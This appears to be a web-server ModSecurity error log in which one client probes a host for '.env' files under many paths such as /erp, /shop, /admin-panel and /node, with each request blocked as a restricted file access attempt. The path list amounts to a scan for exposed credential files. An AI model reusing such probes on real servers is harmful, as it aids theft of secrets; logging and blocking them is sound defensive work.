[Mon May 11 18:07:16.395712 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/erp/.env"] [unique_id "agH-tA-Qm4vhlWBPlMjeDAAAAAo"]
[Mon May 11 18:07:16.395947 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/erp/.env"] [unique_id "agH-tA-Qm4vhlWBPlMjeDAAAAAo"]
[Mon May 11 18:07:16.396248 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tA-Qm4vhlWBPlMjeDAAAAAo"]
[Mon May 11 18:07:16.666427 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/shop/.env"] [unique_id "agH-tA-Qm4vhlWBPlMjeDQAAAAo"]
[Mon May 11 18:07:16.666911 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/shop/.env"] [unique_id "agH-tA-Qm4vhlWBPlMjeDQAAAAo"]
[Mon May 11 18:07:16.667256 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tA-Qm4vhlWBPlMjeDQAAAAo"]
[Mon May 11 18:07:17.315721 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/store/.env"] [unique_id "agH-tQ-Qm4vhlWBPlMjeDgAAAAo"]
[Mon May 11 18:07:17.315955 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/store/.env"] [unique_id "agH-tQ-Qm4vhlWBPlMjeDgAAAAo"]
[Mon May 11 18:07:17.316265 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tQ-Qm4vhlWBPlMjeDgAAAAo"]
[Mon May 11 18:07:17.572068 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/saas/.env"] [unique_id "agH-tQ-Qm4vhlWBPlMjeEAAAAAo"]
[Mon May 11 18:07:17.572330 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/saas/.env"] [unique_id "agH-tQ-Qm4vhlWBPlMjeEAAAAAo"]
[Mon May 11 18:07:17.572659 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tQ-Qm4vhlWBPlMjeEAAAAAo"]
[Mon May 11 18:07:17.909369 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/client/.env"] [unique_id "agH-tQ-Qm4vhlWBPlMjeEQAAAAo"]
[Mon May 11 18:07:17.909639 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/client/.env"] [unique_id "agH-tQ-Qm4vhlWBPlMjeEQAAAAo"]
[Mon May 11 18:07:17.909959 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tQ-Qm4vhlWBPlMjeEQAAAAo"]
[Mon May 11 18:07:18.243015 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/project/.env"] [unique_id "agH-tg-Qm4vhlWBPlMjeEgAAAAo"]
[Mon May 11 18:07:18.243354 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/project/.env"] [unique_id "agH-tg-Qm4vhlWBPlMjeEgAAAAo"]
[Mon May 11 18:07:18.243657 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tg-Qm4vhlWBPlMjeEgAAAAo"]
[Mon May 11 18:07:18.508984 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin-panel/.env"] [unique_id "agH-tg-Qm4vhlWBPlMjeEwAAAAo"]
[Mon May 11 18:07:18.509235 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin-panel/.env"] [unique_id "agH-tg-Qm4vhlWBPlMjeEwAAAAo"]
[Mon May 11 18:07:18.509552 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tg-Qm4vhlWBPlMjeEwAAAAo"]
[Mon May 11 18:07:18.828309 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/control-panel/.env"] [unique_id "agH-tg-Qm4vhlWBPlMjeFQAAAAo"]
[Mon May 11 18:07:18.828582 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/control-panel/.env"] [unique_id "agH-tg-Qm4vhlWBPlMjeFQAAAAo"]
[Mon May 11 18:07:18.828973 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tg-Qm4vhlWBPlMjeFQAAAAo"]
[Mon May 11 18:07:19.303873 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/user-panel/.env"] [unique_id "agH-tw-Qm4vhlWBPlMjeFgAAAAo"]
[Mon May 11 18:07:19.304144 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/user-panel/.env"] [unique_id "agH-tw-Qm4vhlWBPlMjeFgAAAAo"]
[Mon May 11 18:07:19.305171 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tw-Qm4vhlWBPlMjeFgAAAAo"]
[Mon May 11 18:07:19.608302 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/node/.env"] [unique_id "agH-tw-Qm4vhlWBPlMjeFwAAAAo"]
[Mon May 11 18:07:19.608540 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/node/.env"] [unique_id "agH-tw-Qm4vhlWBPlMjeFwAAAAo"]
[Mon May 11 18:07:19.608840 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tw-Qm4vhlWBPlMjeFwAAAAo"]
[Mon May 11 18:07:20.050409 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/express/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeGQAAAAo"]
[Mon May 11 18:07:20.050630 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/express/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeGQAAAAo"]
[Mon May 11 18:07:20.051567 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uA-Qm4vhlWBPlMjeGQAAAAo"]
[Mon May 11 18:07:20.341504 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/next/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeGgAAAAo"]
[Mon May 11 18:07:20.341723 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/next/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeGgAAAAo"]
[Mon May 11 18:07:20.342030 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uA-Qm4vhlWBPlMjeGgAAAAo"]
[Mon May 11 18:07:20.622265 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/nuxt/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeGwAAAAo"]
[Mon May 11 18:07:20.622479 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/nuxt/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeGwAAAAo"]
[Mon May 11 18:07:20.622783 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uA-Qm4vhlWBPlMjeGwAAAAo"]
[Mon May 11 18:07:20.932932 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/nest/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeHAAAAAo"]
